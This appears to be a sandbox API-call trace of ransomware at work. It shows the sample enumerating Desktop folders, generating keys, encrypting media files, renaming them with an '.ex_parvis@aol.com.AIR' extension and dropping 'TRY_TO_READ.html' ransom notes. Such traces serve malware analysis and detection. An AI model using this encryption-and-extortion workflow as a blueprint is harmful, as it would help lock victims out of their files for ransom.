	[0105.997] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.997] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.998] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xdace, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xdace, lpOverlapped=0x0) returned 1
	[0106.000] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179c60d0, ftCreationTime.dwHighDateTime=0x1d4cd27, ftLastAccessTime.dwLowDateTime=0xe6141cb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6141cb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dad30
	[0106.000] FindNextFileW (in: hFindFile=0x5dad30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179c60d0, ftCreationTime.dwHighDateTime=0x1d4cd27, ftLastAccessTime.dwLowDateTime=0xe6141cb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6141cb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.000] FindNextFileW (in: hFindFile=0x5dad30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf91adf30, ftCreationTime.dwHighDateTime=0x1d4cc43, ftLastAccessTime.dwLowDateTime=0x4ab7780, ftLastAccessTime.dwHighDateTime=0x1d4ccb5, ftLastWriteTime.dwLowDateTime=0x4ab7780, ftLastWriteTime.dwHighDateTime=0x1d4ccb5, nFileSizeHigh=0x0, nFileSizeLow=0x119cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HTQL.swf", cAlternateFileName="")) returned 1
	[0106.000] FindNextFileW (in: hFindFile=0x5dad30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc85dd90, ftCreationTime.dwHighDateTime=0x1d4cfef, ftLastAccessTime.dwLowDateTime=0x52c550c0, ftLastAccessTime.dwHighDateTime=0x1d4cdd8, ftLastWriteTime.dwLowDateTime=0x52c550c0, ftLastWriteTime.dwHighDateTime=0x1d4cdd8, nFileSizeHigh=0x0, nFileSizeLow=0xa5a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JReRd7qgaYjV47gZMO6.jpg", cAlternateFileName="JRERD7~1.JPG")) returned 1
	[0106.000] FindNextFileW (in: hFindFile=0x5dad30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7012dca0, ftCreationTime.dwHighDateTime=0x1d4d1e4, ftLastAccessTime.dwLowDateTime=0xdebc56a0, ftLastAccessTime.dwHighDateTime=0x1d4cebe, ftLastWriteTime.dwLowDateTime=0xdebc56a0, ftLastWriteTime.dwHighDateTime=0x1d4cebe, nFileSizeHigh=0x0, nFileSizeLow=0x13e8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p_G7b3ulDE lcciqN0.wav", cAlternateFileName="P_G7B3~1.WAV")) returned 1
	[0106.000] FindNextFileW (in: hFindFile=0x5dad30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6141cb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6141cb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6141cb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.000] FindNextFileW (in: hFindFile=0x5dad30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6141cb0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6141cb0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6141cb0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0106.000] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.000] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.000] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav", dwFileAttributes=0x80) returned 1
	[0106.001] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav") returned 73
	[0106.001] GetProcessHeap () returned 0x540000
	[0106.001] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x598b60
	[0106.001] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav"
	[0106.001] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.001] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\p_g7b3ulde lcciqn0.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\p_g7b3ulde lcciqn0.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.003] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\p_G7b3ulDE lcciqN0.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\p_g7b3ulde lcciqn0.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510
	[0106.003] GetProcessHeap () returned 0x540000
	[0106.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.003] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=81548) returned 1
	[0106.003] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x13e8c
	[0106.003] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.004] GetProcessHeap () returned 0x540000
	[0106.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.004] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.006] WriteFile (in: hFile=0x510, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.006] WriteFile (in: hFile=0x510, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.006] WriteFile (in: hFile=0x510, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.007] ReadFile (in: hFile=0x510, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x13e8c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x13e8c, lpOverlapped=0x0) returned 1
	[0106.009] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.009] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.009] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg", dwFileAttributes=0x80) returned 1
	[0106.010] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg") returned 74
	[0106.010] GetProcessHeap () returned 0x540000
	[0106.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8670
	[0106.010] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg"
	[0106.010] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.010] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\jrerd7qgayjv47gzmo6.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\jrerd7qgayjv47gzmo6.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.018] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\JReRd7qgaYjV47gZMO6.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\jrerd7qgayjv47gzmo6.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510
	[0106.018] GetProcessHeap () returned 0x540000
	[0106.018] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.018] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=42401) returned 1
	[0106.018] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa5a1
	[0106.018] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.018] GetProcessHeap () returned 0x540000
	[0106.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.018] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.020] WriteFile (in: hFile=0x510, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.021] WriteFile (in: hFile=0x510, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.021] WriteFile (in: hFile=0x510, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.021] ReadFile (in: hFile=0x510, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xa5a1, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xa5a1, lpOverlapped=0x0) returned 1
	[0106.023] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.023] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.023] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf", dwFileAttributes=0x80) returned 1
	[0106.023] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf") returned 59
	[0106.023] GetProcessHeap () returned 0x540000
	[0106.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x603bd0
	[0106.023] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf"
	[0106.023] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.023] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\htql.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\htql.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.026] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A0d8C0PI1aL\\HTQL.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a0d8c0pi1al\\htql.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510
	[0106.026] GetProcessHeap () returned 0x540000
	[0106.026] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0106.026] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=72139) returned 1
	[0106.026] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x119cb
	[0106.026] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.026] GetProcessHeap () returned 0x540000
	[0106.026] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.026] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.026] WriteFile (in: hFile=0x510, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.027] WriteFile (in: hFile=0x510, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.027] WriteFile (in: hFile=0x510, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.028] ReadFile (in: hFile=0x510, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x119cb, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x119cb, lpOverlapped=0x0) returned 1
	[0106.030] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14082f90, ftCreationTime.dwHighDateTime=0x1d4d032, ftLastAccessTime.dwLowDateTime=0xe6167e10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6167e10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dad70
	[0106.030] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14082f90, ftCreationTime.dwHighDateTime=0x1d4d032, ftLastAccessTime.dwLowDateTime=0xe6167e10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6167e10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.030] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd322fc90, ftCreationTime.dwHighDateTime=0x1d4cecd, ftLastAccessTime.dwLowDateTime=0x32347b70, ftLastAccessTime.dwHighDateTime=0x1d4cb66, ftLastWriteTime.dwLowDateTime=0x32347b70, ftLastWriteTime.dwHighDateTime=0x1d4cb66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-r8EF", cAlternateFileName="")) returned 1
	[0106.030] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-r8EF\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\-r8ef\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514
	[0106.033] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb398efb0, ftCreationTime.dwHighDateTime=0x1d4d0cb, ftLastAccessTime.dwLowDateTime=0x257d94a0, ftLastAccessTime.dwHighDateTime=0x1d4d392, ftLastWriteTime.dwLowDateTime=0x257d94a0, ftLastWriteTime.dwHighDateTime=0x1d4d392, nFileSizeHigh=0x0, nFileSizeLow=0x9923, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-SwZTHVATD8.m4a", cAlternateFileName="-SWZTH~1.M4A")) returned 1
	[0106.033] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d01c80, ftCreationTime.dwHighDateTime=0x1d4cda6, ftLastAccessTime.dwLowDateTime=0xd03ef210, ftLastAccessTime.dwHighDateTime=0x1d4d0d3, ftLastWriteTime.dwLowDateTime=0xd03ef210, ftLastWriteTime.dwHighDateTime=0x1d4d0d3, nFileSizeHigh=0x0, nFileSizeLow=0x3797, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3O4 o-R4.flv", cAlternateFileName="3O4O-R~1.FLV")) returned 1
	[0106.033] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3b7940, ftCreationTime.dwHighDateTime=0x1d4ca43, ftLastAccessTime.dwLowDateTime=0x7203cf60, ftLastAccessTime.dwHighDateTime=0x1d4cff0, ftLastWriteTime.dwLowDateTime=0x7203cf60, ftLastWriteTime.dwHighDateTime=0x1d4cff0, nFileSizeHigh=0x0, nFileSizeLow=0x4f0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D6mN1Jhxf _N8-qKxFMf.m4a", cAlternateFileName="D6MN1J~1.M4A")) returned 1
	[0106.034] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5264f5f0, ftCreationTime.dwHighDateTime=0x1d4d0c5, ftLastAccessTime.dwLowDateTime=0xe9486680, ftLastAccessTime.dwHighDateTime=0x1d4c7f8, ftLastWriteTime.dwLowDateTime=0xe9486680, ftLastWriteTime.dwHighDateTime=0x1d4c7f8, nFileSizeHigh=0x0, nFileSizeLow=0x5df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S88rWJqet02.avi", cAlternateFileName="S88RWJ~1.AVI")) returned 1
	[0106.034] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6167e10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6167e10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6167e10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.034] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x332f50d0, ftCreationTime.dwHighDateTime=0x1d4c8e2, ftLastAccessTime.dwLowDateTime=0x745407d0, ftLastAccessTime.dwHighDateTime=0x1d4cc49, ftLastWriteTime.dwLowDateTime=0x745407d0, ftLastWriteTime.dwHighDateTime=0x1d4cc49, nFileSizeHigh=0x0, nFileSizeLow=0xc7ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vaT01rvU.m4a", cAlternateFileName="")) returned 1
